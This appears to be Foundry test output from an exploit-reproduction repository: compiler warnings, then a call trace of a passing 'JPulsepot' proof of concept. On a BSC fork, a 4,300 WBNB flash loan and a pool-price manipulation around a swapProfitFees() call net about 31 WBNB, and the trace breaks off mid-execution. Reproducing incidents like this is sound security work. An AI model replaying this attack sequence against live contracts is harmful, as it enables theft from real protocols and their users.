Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.22s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2025-01/JPulsepot_exp.sol:50:37:
   |
50 |     function pancakeV3FlashCallback(uint256 fee0, uint256 fee1, bytes memory data) external {
   |                                     ^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 566.56ms (3.68ms CPU time)

Ran 1 test for src/test/2025-01/JPulsepot_exp.sol:JPulsepot
[PASS] testExploit() (gas: 733122)
Logs:
  Attacker WBNB Balance Before exploit: 0.000000000000000000
  Attacker WBNB Balance After exploit: 30.968120414037532669

Traces:
  [10740] JPulsepot::setUp()
    ├─ [0] VM::createSelectFork("bsc", 45640245 [4.564e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [921668] JPulsepot::testExploit()
    ├─ [3264] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::symbol() [staticcall]
    │   └─ ← [Return] "WBNB"
    ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [2444] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker WBNB Balance Before exploit", val: 0, decimals: 18)
    ├─ [874244] 0x172fcD41E0913e95784454622d1c3724f546f849::flash(JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 4300000000000000000000 [4.3e21], 0x0000000000000000000000000000000000000000000000e91a7cd19fa3b00000)
    │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x172fcD41E0913e95784454622d1c3724f546f849) [staticcall]
    │   │   └─ ← [Return] 3178686471569296579127296 [3.178e24]
    │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x172fcD41E0913e95784454622d1c3724f546f849) [staticcall]
    │   │   └─ ← [Return] 4478385724514701387203 [4.478e21]
    │   ├─ [25962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 4300000000000000000000 [4.3e21])
    │   │   ├─ emit Transfer(from: 0x172fcD41E0913e95784454622d1c3724f546f849, to: JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 4300000000000000000000 [4.3e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0xed93f154226bea5228a538ddd7f6e1b8d878a5d95dc495daa8ac4679fe6b0986: 0x0000000000000000000000000000000000000000000000f2c61638f10f27a5c3 → 0x000000000000000000000000000000000000000000000009ab9967516b77a5c3
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000e91a7cd19fa3b00000
    │   │   └─ ← [Return] true
    │   ├─ [812373] JPulsepot::pancakeV3FlashCallback(0, 430000000000000000 [4.3e17], 0x0000000000000000000000000000000000000000000000e91a7cd19fa3b00000)
    │   │   ├─ [24420] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [89204] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(4300000000000000000000 [4.3e21], 0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD], JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1736501998 [1.736e9])
    │   │   │   ├─ [8225] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transferFrom(JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, 4300000000000000000000 [4.3e21])
    │   │   │   │   ├─ emit Transfer(from: JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, value: 4300000000000000000000 [4.3e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000e91a7cd19fa3b00000 → 0
    │   │   │   │   │   @ 0x66ec1991f6397975a4f4a1234495c6e178d730f45f32c044c0a3953f810d8b92: 0x00000000000000000000000000000000000000000000001f2c8e8a9050a5e319 → 0x000000000000000000000000000000000000000000000108470b5c2ff455e319
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2531] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::balanceOf(JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 575059722221790815001 [5.75e20], 19683020234934991242367 [1.968e22], 1736501716 [1.736e9]
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   └─ ← [Return] 4875059722221790815001 [4.875e21]
    │   │   │   ├─ [62348] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::swap(0, 17356089427655381925726 [1.735e22], JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [27971] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::transfer(JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 17356089427655381925726 [1.735e22])
    │   │   │   │   │   ├─ emit Transfer(from: 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, to: JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 17356089427655381925726 [1.735e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000003ace02051f31fd2bf5e
    │   │   │   │   │   │   @ 0x8a489ea344a3a07b0cdfa9d1a5f7e562e8e7801e934af5b7a32cbede3ef02c99: 0x00000000000000000000000000000000000000000000042b04c73a900de0c47f → 0x00000000000000000000000000000000000000000000007e24a6e89cee0e0521
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4875059722221790815001 [4.875e21]
    │   │   │   │   ├─ [531] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2326930807279609316641 [2.326e21]
    │   │   │   │   ├─ emit Sync(reserve0: 4875059722221790815001 [4.875e21], reserve1: 2326930807279609316641 [2.326e21])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 4300000000000000000000 [4.3e21], amount1In: 0, amount0Out: 0, amount1Out: 17356089427655381925726 [1.735e22], to: JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 9: 0x0000000000000000000000000000e30ac02141ada52b951acafb053e2d0374a7 → 0x0000000000000000000000000000e30ae5d57de53afd2e71a60a74fc1f88e999
    │   │   │   │   │   @ 8: 0x6780e9d400000000042b04c73a900de0c47f00000000001f2c8e8a9050a5e319 → 0x6780eaee00000000007e24a6e89cee0e0521000000000108470b5c2ff455e319
    │   │   │   │   │   @ 10: 0x00000000000000000000000000000040c7d14098fea0e0957cf41d2ff1b05046 → 0x00000000000000000000000000000040c7d97dc2e5cf036397ed55c3d69c72ae
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [531] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::balanceOf(JPulsepot: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 17356089427655381925726 [1.735e22]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [602045] 0x384b9fb6E42dab87F3023D87ea1575499A69998E::swapProfitFees()
    │   │   │   ├─ [5151] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsIn(48090000000000000000 [4.809e19], [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4875059722221790815001 [4.875e21], 2326930807279609316641 [2.326e21], 1736501998 [1.736e9]
    │   │   │   │   └─ ← [Return] [103135416163530787817 [1.031e20], 48090000000000000000 [4.809e19]]
    │   │   │   ├─ [5111] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(17600400000000000000 [1.76e19], [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4875059722221790815001 [4.875e21], 2326930807279609316641 [2.326e21], 1736501998 [1.736e9]
    │   │   │   │   └─ ← [Return] [17600400000000000000 [1.76e19], 8349832622427605647 [8.349e18]]
    │   │   │   ├─ [13631] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsIn(22020000000000000000 [2.202e19], [0x4D9927a8Dc4432B93445dA94E4084D292438931F, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4875059722221790815001 [4.875e21], 2326930807279609316641 [2.326e21], 1736501998 [1.736e9]
    │   │   │   │   ├─ [2893] 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 121263025417142429893090 [1.212e23], 72739253315769478301 [7.273e19], 1736491495 [1.736e9]
    │   │   │   │   └─ ← [Return] [217902307222553107209870 [2.179e23], 46690682950839373836 [4.669e19], 22020000000000000000 [2.202e19]]
    │   │   │   ├─ [9035] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(36597855250000000000000 [3.659e22], [0x4D9927a8Dc4432B93445dA94E4084D292438931F, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD]) [staticcall]
    │   │   │   │   ├─ [893] 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 121263025417142429893090 [1.212e23], 72739253315769478301 [7.273e19], 1736491495 [1.736e9]
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4875059722221790815001 [4.875e21], 2326930807279609316641 [2.326e21], 1736501998 [1.736e9]
    │   │   │   │   └─ ← [Return] [36597855250000000000000 [3.659e22], 16831183026189930161 [1.683e19], 7986159668894686738 [7.986e18]]
    │   │   │   ├─ [24596] 0x4D9927a8Dc4432B93445dA94E4084D292438931F::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 36597855250000000000000 [3.659e22])
    │   │   │   │   ├─ emit Approval(owner: 0x384b9fb6E42dab87F3023D87ea1575499A69998E, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 36597855250000000000000 [3.659e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5b7bc9a4b3916f0ad53599c4fb8d6d0087d6a6c406f5dfbd8a9bb9b545564b6d: 0 → 0x0000000000000000000000000000000000000000000007bff944f620a6db2000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [119455] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForETH(36597855250000000000000 [3.659e22], 0, [0x4D9927a8Dc4432B93445dA94E4084D292438931F, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], 0x384b9fb6E42dab87F3023D87ea1575499A69998E, 1736501998 [1.736e9])
    │   │   │   │   ├─ [893] 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 121263025417142429893090 [1.212e23], 72739253315769478301 [7.273e19], 1736491495 [1.736e9]
    │   │   │   │   ├─ [28303] 0x4D9927a8Dc4432B93445dA94E4084D292438931F::transferFrom(0x384b9fb6E42dab87F3023D87ea1575499A69998E, 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA, 36597855250000000000000 [3.659e22])
    │   │   │   │   │   ├─ emit Approval(owner: 0x384b9fb6E42dab87F3023D87ea1575499A69998E, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(0x4D9927a8Dc4432B93445dA94E4084D292438931F, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA
    │   │   │   │   │   ├─ emit Transfer(from: 0x384b9fb6E42dab87F3023D87ea1575499A69998E, to: 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA, value: 36597855250000000000000 [3.659e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5b7bc9a4b3916f0ad53599c4fb8d6d0087d6a6c406f5dfbd8a9bb9b545564b6d: 0x0000000000000000000000000000000000000000000007bff944f620a6db2000 → 0
    │   │   │   │   │   │   @ 0x68c30d1e7cf26cf365a022b6d20d2d5970bf82fd537440904751b068d86d8081: 0x0000000000000000000000000000000000000000000019adae8921d8d31941e2 → 0x00000000000000000000000000000000000000000000216da7ce17f979f461e2
    │   │   │   │   │   │   @ 0xd1ac2dadac43c8880ce6d2c400a596bd74e599defce414b22a7ccc32f2ac2b0a: 0x0000000000000000000000000000000000000000000007bff944f620a6db2000 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [64816] 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA::swap(0, 16831183026189930161 [1.683e19], 0x10ED43C718714eb63d5aA57B78B54704E256024E, 0x)
    │   │   │   │   │   ├─ [29962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x10ED43C718714eb63d5aA57B78B54704E256024E, 16831183026189930161 [1.683e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA, to: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 16831183026189930161 [1.683e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xc15b03f8db466dcad5fc466ccba1286dae80bc27548e0b2bb4d36dc85c13f136: 0x000000000000000000000000000000000000000000000003f175bd8069982c9d → 0x00000000000000000000000000000000000000000000000307e15db6f7f59dec
    │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x000000000000000000000000000000000000000000000000e9945fc971a28eb1
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [1008] 0x4D9927a8Dc4432B93445dA94E4084D292438931F::balanceOf(0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 157860880667142429893090 [1.578e23]
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x4C736d24d72D874cc2465553500c1Ff3Fc7b3BDA) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 55908070289579548140 [5.59e19]
    │   │   │   │   │   ├─ emit Sync(reserve0: 157860880667142429893090 [1.578e23], reserve1: 55908070289579548140 [5.59e19])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 36597855250000000000000 [3.659e22], amount1In: 0, amount0Out: 0, amount1Out: 16831183026189930161 [1.683e19], to: 0x10ED43C718714eb63d5aA57B78B54704E256024E)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 9: 0x000000000000000000000000000000078215a16acd073b6b33ba2df063589d83 → 0x00000000000000000000000000000007821bee4433e383b8b13c1df73a47817a
    │   │   │   │   │   │   @ 8: 0x6780c1e7000000000003f175bd8069982c9d0000000019adae8921d8d31941e2 → 0x6780eaee00000000000307e15db6f7f59dec00000000216da7ce17f979f461e2
    │   │   │   │   │   │   @ 10: 0x000000000000000000000000000c8b8fd22f452b87d4a5e7ea5fd3a06da8f45c → 0x000000000000000000000000000c8c9afe8a46a52a181c4f84573afa8dfcb4ea
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [9223] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(16831183026189930161 [1.683e19])
    │   │   │   │   │   ├─ [83] 0x10ED43C718714eb63d5aA57B78B54704E256024E::fallback{value: 16831183026189930161}()
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ emit Withdrawal(src: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 16831183026189930161 [1.683e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x000000000000000000000000000000000000000000000000e9945fc971a28eb1 → 0
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [55] 0x384b9fb6E42dab87F3023D87ea1575499A69998E::fallback{value: 16831183026189930161}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [36597855250000000000000 [3.659e22], 16831183026189930161 [1.683e19]]
    │   │   │   ├─ [81228] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactETHForTokens{value: 34431583026189930161}(0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD], 0x384b9fb6E42dab87F3023D87ea1575499A69998E, 1736501998 [1.736e9])
    │   │   │   │   ├─ [893] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4875059722221790815001 [4.875e21], 2326930807279609316641 [2.326e21], 1736501998 [1.736e9]
    │   │   │   │   ├─ [21974] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::deposit{value: 34431583026189930161}()
    │   │   │   │   │   ├─ emit Deposit(dst: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 34431583026189930161 [3.443e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x000000000000000000000000000000000000000000000001ddd58e56026b8eb1
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x824eb9faDFb377394430d2744fa7C42916DE3eCe, 34431583026189930161 [3.443e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0x10ED43C718714eb63d5aA57B78B54704E256024E, to: 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, value: 34431583026189930161 [3.443e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x66ec1991f6397975a4f4a1234495c6e178d730f45f32c044c0a3953f810d8b92: 0x000000000000000000000000000000000000000000000108470b5c2ff455e319 → 0x00000000000000000000000000000000000000000000010a24e0ea85f6c171ca
    │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x000000000000000000000000000000000000000000000001ddd58e56026b8eb1 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [40264] 0x824eb9faDFb377394430d2744fa7C42916DE3eCe::swap(0, 16278878565747828785 [1.627e19], 0x384b9fb6E42dab87F3023D87ea1575499A69998E, 0x)
    │   │   │   │   │   ├─ [25171] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::transfer(0x384b9fb6E42dab87F3023D87ea1575499A69998E, 16278878565747828785 [1.627e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x824eb9faDFb377394430d2744fa7C42916DE3eCe, to: 0x384b9fb6E42dab87F3023D87ea1575499A69998E, value: 16278878565747828785 [1.627e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x9dfb2af466b9814ac6d1df4767f6b2b361388fd602aac25983ec0d8ac079b5b3: 0 → 0x000000000000000000000000000000000000000000000000e1ea31ce6d1ea831
    │   │   │   │   │   │   │   @ 0x8a489ea344a3a07b0cdfa9d1a5f7e562e8e7801e934af5b7a32cbede3ef02c99: 0x00000000000000000000000000000000000000000000007e24a6e89cee0e0521 → 0x00000000000000000000000000000000000000000000007d42bcb6ce80ef5cf0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 4909491305247980745162 [4.909e21]
    │   │   │   │   │   ├─ [531] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::balanceOf(0x824eb9faDFb377394430d2744fa7C42916DE3eCe) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2310651928713861487856 [2.31e21]
    │   │   │   │   │   ├─ emit Sync(reserve0: 4909491305247980745162 [4.909e21], reserve1: 2310651928713861487856 [2.31e21])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 34431583026189930161 [3.443e19], amount1In: 0, amount0Out: 0, amount1Out: 16278878565747828785 [1.627e19], to: 0x384b9fb6E42dab87F3023D87ea1575499A69998E)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x6780eaee00000000007e24a6e89cee0e0521000000000108470b5c2ff455e319 → 0x6780eaee00000000007d42bcb6ce80ef5cf000000000010a24e0ea85f6c171ca
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [34431583026189930161 [3.443e19], 16278878565747828785 [1.627e19]]
    │   │   │   ├─ [24562] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::approve(0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e, 16278878565747828785 [1.627e19])
    │   │   │   │   ├─ emit Approval(owner: 0x384b9fb6E42dab87F3023D87ea1575499A69998E, spender: 0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e, value: 16278878565747828785 [1.627e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xa1de590f50986f719a4fe14057eade5c548648603823788ddfff511654e7b0b5: 0 → 0x000000000000000000000000000000000000000000000000e1ea31ce6d1ea831
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [67053] 0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e::swap(16278878565747828785 [1.627e19], 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD, 0x404460C6A5EdE2D891e8297795264fDe62ADBB75)
    │   │   │   │   ├─ emit LiquidityUpdated(param0: 89852938040642943640492 [8.985e22], param1: 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD, param2: 0x404460C6A5EdE2D891e8297795264fDe62ADBB75)
    │   │   │   │   ├─ emit LiquidityUpdated(param0: 25470364993057426271311 [2.547e22], param1: 0x404460C6A5EdE2D891e8297795264fDe62ADBB75, param2: 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD)
    │   │   │   │   ├─ emit TokensSwapped(param0: 16278878565747828785 [1.627e19], param1: 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD, param2: 0x404460C6A5EdE2D891e8297795264fDe62ADBB75, param3: 0x384b9fb6E42dab87F3023D87ea1575499A69998E)
    │   │   │   │   ├─ [10834] 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD::transferFrom(0x384b9fb6E42dab87F3023D87ea1575499A69998E, 0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e, 16278878565747828785 [1.627e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0x384b9fb6E42dab87F3023D87ea1575499A69998E, to: 0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e, value: 16278878565747828785 [1.627e19])
    │   │   │   │   │   ├─ emit Approval(owner: 0x384b9fb6E42dab87F3023D87ea1575499A69998E, spender: 0x1FCc3B22955e76Ca48bF025f1A6993685975Bb9e, value: 0)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xa1de590f50986f719a4fe14057eade5c548648603823788ddfff511654e7b0b5: 0x000000000000000000000000000000000000000000000000e1ea31ce6d1ea831 → 0
    │   │   │   │   │   │   @ 0x9dfb2af466b9814ac6d1df4767f6b2b361388fd602aac25983ec0d8ac079b5b3: 0x000000000000000000000000000000000000000000000000e1ea31ce6d1ea831 → 0
    │   │   │   │   │   │   @ 0x7a8a83883374ebb670026484a5db830e6ee4f911f570e643f60d1dbd68b9ee2d: 0x000000000000000000000000000000000000000000000563e3435ebf66dcc41e → 0x000000000000000000000000000000000000000000000564c52d908dd3fb6c4f
